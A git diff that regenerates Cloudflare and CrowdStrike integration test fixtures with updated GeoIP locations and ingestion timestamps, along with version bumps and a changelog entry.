+ "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3590,6 +3590,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389095897Z", + "original": "{\"action\":{\"result\":true,\"type\":\"change_setting\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"557dd5f0-829e-5567-9007-e5c5aeba7393\",\"interface\":\"UI\",\"metadata\":{\"name\":\"IPv6\",\"type\":\"network\",\"value\":true,\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:42Z\"}", + "provider": "UI", + "kind": "event", + "action": "change_setting", + "id": "557dd5f0-829e-5567-9007-e5c5aeba7393", + "type": [ + "change" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3610,21 +3625,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776221467Z", - "original": "{\"action\":{\"result\":true,\"type\":\"change_setting\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"557dd5f0-829e-5567-9007-e5c5aeba7393\",\"interface\":\"UI\",\"metadata\":{\"name\":\"IPv6\",\"type\":\"network\",\"value\":true,\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"type\":\"zone\"},\"when\":\"2021-08-09T10:13:42Z\"}", - "provider": "UI", - "kind": "event", - "action": "change_setting", - "id": "557dd5f0-829e-5567-9007-e5c5aeba7393", - "type": [ - "change" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3652,14 +3652,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3671,6 +3671,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389096271Z", + "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5f96da3a-5e9f-4660-b171-fc9c5555e429\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:06:47Z\"}", + "kind": "event", + "action": "token_create", + "id": "5f96da3a-5e9f-4660-b171-fc9c5555e429", + "type": [ + "creation" + ], + "category": [ + "iam" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3689,20 +3703,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776224130Z", - "original": "{\"action\":{\"result\":true,\"type\":\"token_create\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"5f96da3a-5e9f-4660-b171-fc9c5555e429\",\"interface\":\"\",\"metadata\":{\"token_name\":\"Read all resources\",\"token_tag\":\"57baa252c3f0a4b1082848000a969b2b\"},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:06:47Z\"}", - "kind": "event", - "action": "token_create", - "id": "5f96da3a-5e9f-4660-b171-fc9c5555e429", - "type": [ - "creation" - ], - "category": [ - "iam" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3730,14 +3730,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -3749,6 +3749,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389096639Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"441c9104-05e7-5992-9da1-ae5c13536a44\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:03:16Z\"}", + "kind": "event", + "action": "login", + "id": "441c9104-05e7-5992-9da1-ae5c13536a44", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3763,20 +3777,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776226731Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"441c9104-05e7-5992-9da1-ae5c13536a44\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-08-09T10:03:16Z\"}", - "kind": "event", - "action": "login", - "id": "441c9104-05e7-5992-9da1-ae5c13536a44", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -3804,22 +3804,30 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, + "event": { + "ingested": "2021-12-14T14:41:11.389097027Z", + "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"type\":\"user\"},\"id\":\"0c4c5855-e752-55df-8705-26baac6ac0ac\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-05-10T12:26:19Z\"}", + "kind": "event", + "action": "login", + "id": "0c4c5855-e752-55df-8705-26baac6ac0ac", + "type": [ + "info" + ], + "category": [ + "authentication" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -3834,20 +3842,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776229335Z", - "original": "{\"action\":{\"result\":true,\"type\":\"login\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"type\":\"user\"},\"id\":\"0c4c5855-e752-55df-8705-26baac6ac0ac\",\"interface\":\"\",\"metadata\":{},\"newValue\":\"\",\"oldValue\":\"\",\"owner\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\"},\"resource\":{\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"type\":\"account\"},\"when\":\"2021-05-10T12:26:19Z\"}", - "kind": "event", - "action": "login", - "id": "0c4c5855-e752-55df-8705-26baac6ac0ac", - "type": [ - "info" - ], - "category": [ - "authentication" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" diff --git a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json index 5290c6b7546..60030ef519b 100644 --- a/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/cloudflare/data_stream/logpull/_dev/test/pipeline/test-http-json.log-expected.json @@ -10,14 +10,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -143,14 +143,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -171,7 +171,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:36:03.427502200Z", + "ingested": "2021-12-14T14:41:17.384224478Z", "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":15169,\"ClientCountry\":\"us\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2577,\"ClientRequestHost\":\"cf-analytics.com\",\"ClientRequestMethod\":\"POST\",\"ClientRequestPath\":\"/wp-cron.php\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://cf-analytics.com/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestURI\":\"/wp-cron.php?doing_wp_cron=1564759748.3962020874023437500000\",\"ClientRequestUserAgent\":\"WordPress/5.2.2;https://cf-analytics.com\",\"ClientSSLCipher\":\"ECDHE-ECDSA-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.2\",\"ClientSrcPort\":55028,\"EdgeColoID\":14,\"EdgeEndTimestamp\":\"2019-08-02T15:29:08Z\",\"EdgePathingOp\":\"chl\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"captchaNew\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"\",\"EdgeResponseBytes\":2848,\"EdgeResponseCompressionRatio\":2.64,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":\"2019-08-02T15:29:08Z\",\"FirewallMatchesActions\":[\"simulate\",\"challenge\"],\"FirewallMatchesSources\":[\"firewallRules\",\"firewallRules\"],\"FirewallMatchesRuleIDs\":[\"094b71fea25d4860a61fa0c6fbbd8d8b\",\"e454fd4a0ce546b3a9a462536613692c\"],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"500115ec386354d8\",\"SecurityLevel\":\"med\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":155978002}", "kind": "event", "start": "2019-08-02T15:29:08.000Z", @@ -197,14 +197,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -301,14 +301,14 @@ "observer": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "type": "proxy", @@ -331,14 +331,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -354,7 +354,7 @@ }, "event": { "duration": 63000000, - "ingested": "2021-12-09T13:36:03.427511200Z", + "ingested": "2021-12-14T14:41:17.384227805Z", "original": "{\"CacheCacheStatus\":\"hit\",\"CacheResponseBytes\":26888,\"CacheResponseStatus\":200,\"CacheTieredFill\":true,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":5324,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestProtocol\":\"HTTP/1.1\",\"ClientRequestReferer\":\"https://eqlplayground.io/s/eqldemo/app/security/timelines/default?sourcerer=(default:!(.siem-signals-eqldemo))\u0026timerange=(global:(linkTo:!(),timerange:(from:%272021-03-03T19:55:15.519Z%27,fromStr:now-24h,kind:relative,to:%272021-03-04T19:55:15.519Z%27,toStr:now)),timeline:(linkTo:!(),timerange:(from:%272020-03-04T19:55:28.684Z%27,fromStr:now-1y,kind:relative,to:%272021-03-04T19:55:28.692Z%27,toStr:now)))\u0026timeline=(activeTab:eql,graphEventId:%27%27,id:%2769f93840-7d23-11eb-866c-79a0609409ba%27,isOpen:!t)\",\"ClientRequestURI\":\"/40865/bundles/plugin/securitySolution/8.0.0/securitySolution.chunk.9.js\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"NONE\",\"ClientSSLProtocol\":\"none\",\"ClientSrcPort\":0,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"33.147.138.217\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625752958875000000,\"EdgePathingOp\":\"wl\",\"EdgePathingSrc\":\"macro\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"eqlplayground.io\",\"EdgeResponseBytes\":24743,\"EdgeResponseCompressionRatio\":0,\"EdgeResponseContentType\":\"application/javascript\",\"EdgeResponseStatus\":200,\"EdgeServerIP\":\"89.160.20.156\",\"EdgeStartTimestamp\":1625752958812000000,\"FirewallMatchesActions\":[],\"FirewallMatchesRuleIDs\":[],\"FirewallMatchesSources\":[],\"OriginIP\":\"\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"66b9d9f88b5b4c4f\",\"RayID\":\"66b9d9f890ae4c4f\",\"SecurityLevel\":\"off\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":true,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:02:38.812Z", @@ -389,14 +389,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -520,14 +520,14 @@ "client": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -548,7 +548,7 @@ }, "event": { "duration": 8000000, - "ingested": "2021-12-09T13:36:03.427515700Z", + "ingested": "2021-12-14T14:41:17.384228500Z", "original": "{\"CacheCacheStatus\":\"unknown\",\"CacheResponseBytes\":0,\"CacheResponseStatus\":0,\"CacheTieredFill\":false,\"ClientASN\":1136,\"ClientCountry\":\"nl\",\"ClientDeviceType\":\"desktop\",\"ClientIP\":\"89.160.20.156\",\"ClientIPClass\":\"noRecord\",\"ClientRequestBytes\":2520,\"ClientRequestHost\":\"eqlplayground.io\",\"ClientRequestMethod\":\"GET\",\"ClientRequestPath\":\"/s/eqldemo/security/account\",\"ClientRequestProtocol\":\"HTTP/2\",\"ClientRequestReferer\":\"\",\"ClientRequestURI\":\"/s/eqldemo/security/account\",\"ClientRequestUserAgent\":\"Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/91.0.4472.124Safari/537.36\",\"ClientSSLCipher\":\"AEAD-AES128-GCM-SHA256\",\"ClientSSLProtocol\":\"TLSv1.3\",\"ClientSrcPort\":61593,\"ClientXRequestedWith\":\"\",\"EdgeColoCode\":\"AMS\",\"EdgeColoID\":20,\"EdgeEndTimestamp\":1625754264684000000,\"EdgePathingOp\":\"ban\",\"EdgePathingSrc\":\"filterBasedFirewall\",\"EdgePathingStatus\":\"nr\",\"EdgeRateLimitAction\":\"\",\"EdgeRateLimitID\":0,\"EdgeRequestHost\":\"183.53.30.34\",\"EdgeResponseBytes\":2066,\"EdgeResponseCompressionRatio\":2.45,\"EdgeResponseContentType\":\"text/html\",\"EdgeResponseStatus\":403,\"EdgeServerIP\":\"\",\"EdgeStartTimestamp\":1625754264676000000,\"FirewallMatchesActions\":[\"block\"],\"FirewallMatchesRuleIDs\":[\"391eb601201e4f2a81038910f2b63f6d\"],\"FirewallMatchesSources\":[\"firewallRules\"],\"OriginIP\":\"89.160.20.156\",\"OriginResponseBytes\":0,\"OriginResponseHTTPExpires\":\"\",\"OriginResponseHTTPLastModified\":\"\",\"OriginResponseStatus\":0,\"OriginResponseTime\":0,\"OriginSSLProtocol\":\"unknown\",\"ParentRayID\":\"00\",\"RayID\":\"66b9f9da396e4c01\",\"SecurityLevel\":\"unk\",\"WAFAction\":\"unknown\",\"WAFFlags\":\"0\",\"WAFMatchedVar\":\"\",\"WAFProfile\":\"unknown\",\"WAFRuleID\":\"\",\"WAFRuleMessage\":\"\",\"WorkerCPUTime\":0,\"WorkerStatus\":\"unknown\",\"WorkerSubrequest\":false,\"WorkerSubrequestCount\":0,\"ZoneID\":393347122}", "kind": "event", "start": "2021-07-08T14:24:24.676Z", diff --git a/packages/cloudflare/manifest.yml b/packages/cloudflare/manifest.yml index 933a62bc468..1d3d68e522f 100644 --- a/packages/cloudflare/manifest.yml +++ b/packages/cloudflare/manifest.yml @@ -1,6 +1,6 @@ name: cloudflare title: Cloudflare -version: 1.2.0 +version: 1.2.1 release: ga description: Collect and parse logs from Cloudflare API with Elastic Agent. type: integration diff --git a/packages/crowdstrike/changelog.yml b/packages/crowdstrike/changelog.yml index 72164b30d22..c81bc022a34 100644 --- a/packages/crowdstrike/changelog.yml +++ b/packages/crowdstrike/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json index 06abc84c8fa..52124879357 100644 --- a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-falcon-audit-events.log-expected.json @@ -17,7 +17,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-12-09T13:36:08.382628100Z", + "ingested": "2021-12-14T14:41:23.505199694Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1045,\n \"eventType\": \"RemoteResponseSessionStartEvent\",\n \"eventCreationTime\": 1582830734000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"StartTimestamp\": 1582830734\n }\n}", "kind": "event", "action": [ @@ -73,7 +73,7 @@ "name": "hostnameofmachine" }, "event": { - "ingested": "2021-12-09T13:36:08.382637400Z", + "ingested": "2021-12-14T14:41:23.505202410Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1046,\n \"eventType\": \"RemoteResponseSessionEndEvent\",\n \"eventCreationTime\": 1582830772000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"SessionId\": \"6020260b-0398-4d41-999d-5531b55522de\",\n \"HostnameField\": \"hostnameofmachine\",\n \"UserName\": \"first.last@company.com\",\n \"EndTimestamp\": 1582830772\n }\n}", "kind": "event", "action": [ @@ -113,13 +113,6 @@ ] }, { - "source": { - "ip": "10.10.0.8" - }, - "message": "Crowdstrike Streaming API", - "tags": [ - "preserve_original_event" - ], "event.action": "stream_started", "@timestamp": "2020-02-12T21:29:10.710Z", "ecs": { @@ -133,8 +126,11 @@ "10.10.0.8" ] }, + "source": { + "ip": "10.10.0.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382641600Z", + "ingested": "2021-12-14T14:41:23.505202897Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 0,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581542950710,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"api-client-id:1234567890abcdefghijklmnopqrstuvwxyz\",\n \"UserIp\": \"10.10.0.8\",\n \"OperationName\": \"streamStarted\",\n \"ServiceName\": \"Crowdstrike Streaming API\",\n \"Success\": true,\n \"UTCTimestamp\": 1581542950,\n \"AuditKeyValues\": [\n {\n \"Key\": \"APIClientID\",\n \"ValueString\": \"1234567890abcdefghijklmnopqr\"\n },\n {\n \"Key\": \"partition\",\n \"ValueString\": \"0\"\n },\n {\n \"Key\": \"offset\",\n \"ValueString\": \"-1\"\n },\n {\n \"Key\": \"appId\",\n \"ValueString\": \"siem-connector-v2.0.0\"\n },\n {\n \"Key\": \"eventType\",\n \"ValueString\": \"[UserActivityAuditEvent HashSpreadingEvent RemoteResponseSessionStartEvent RemoteResponseSessionEndEvent DetectionSummaryEvent AuthActivityAuditEvent]\"\n }\n ]\n }\n}", "category": [ "authentication" @@ -145,6 +141,7 @@ "kind": "event", "outcome": "success" }, + "message": "Crowdstrike Streaming API", "crowdstrike": { "event": { "UserIp": "10.10.0.8", @@ -186,16 +183,12 @@ }, "user": { "name": "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz" - } - }, - { - "source": { - "ip": "192.168.6.8" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-12T21:39:37.147Z", "ecs": { @@ -209,8 +202,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": "2021-12-09T13:36:08.382646400Z", + "ingested": "2021-12-14T14:41:23.505203317Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 1,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581543577147,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"alice@company.com\",\n \"UserIp\": \"192.168.6.8\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581543577147\n }\n}", "category": [ "authentication" @@ -221,6 +217,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-12T21:39:37.147Z", @@ -241,16 +238,12 @@ "user": { "name": "alice@company.com", "email": "alice@company.com" - } - }, - { - "source": { - "ip": "192.168.6.3" }, - "message": "CrowdStrike Authentication", "tags": [ "preserve_original_event" - ], + ] + }, + { "event.action": "two_factor_authenticate", "@timestamp": "2020-02-12T22:14:37.554Z", "ecs": { @@ -264,8 +257,11 @@ "192.168.6.3" ] }, + "source": { + "ip": "192.168.6.3" + }, "event": { - "ingested": "2021-12-09T13:36:08.382651900Z", + "ingested": "2021-12-14T14:41:23.505203706Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 2,\n \"eventType\": \"AuthActivityAuditEvent\",\n \"eventCreationTime\": 1581545677554,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"bob@company.com\",\n \"UserIp\": \"192.168.6.3\",\n \"OperationName\": \"twoFactorAuthenticate\",\n \"ServiceName\": \"CrowdStrike Authentication\",\n \"Success\": true,\n \"UTCTimestamp\": 1581545677554\n }\n}", "category": [ "authentication" @@ -276,6 +272,7 @@ "kind": "event", "outcome": "success" }, + "message": "CrowdStrike Authentication", "crowdstrike": { "event": { "UTCTimestamp": "2020-02-12T22:14:37.554Z", @@ -296,7 +293,10 @@ "user": { "name": "bob@company.com", "email": "bob@company.com" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "@timestamp": "2020-02-12T22:24:08.000Z", @@ -315,7 +315,7 @@ "ip": "192.168.6.13" }, "event": { - "ingested": "2021-12-09T13:36:08.382656900Z", + "ingested": "2021-12-14T14:41:23.505204142Z", "original": "{\n \"metadata\": {\n \"customerIDString\": \"8f69fe9e-b995-4204-95ad-44f9bcf75b6b\",\n \"offset\": 3,\n \"eventType\": \"UserActivityAuditEvent\",\n \"eventCreationTime\": 1581546248000,\n \"version\": \"1.0\"\n },\n \"event\": {\n \"UserId\": \"chris@company.com\",\n \"UserIp\": \"192.168.6.13\",\n \"OperationName\": \"update_group\",\n \"ServiceName\": \"groups\",\n \"AuditKeyValues\": [\n {\n \"Key\": \"group_id\",\n \"ValueString\": \"3c80ce30b9654cb4bd15beec6a517e65\"\n },\n {\n \"Key\": \"action_name\",\n \"ValueString\": \"add_group_member\"\n }\n ],\n \"UTCTimestamp\": 1581546248\n }\n}", "kind": "event", "action": "user_activity_audit_event", @@ -363,13 +363,6 @@ ] }, { - "source": { - "ip": "192.168.6.8" - }, - "message": "CrowdStrike Authentication", - "tags": [ - "preserve_original_event" - ], "event.action": "request_reset_password", "@timestamp": "2020-02-13T13:41:52.140Z", "ecs": { @@ -383,8 +376,11 @@ "192.168.6.8" ] }, + "source": { + "ip": "192.168.6.8" + }, "event": { - "ingested": 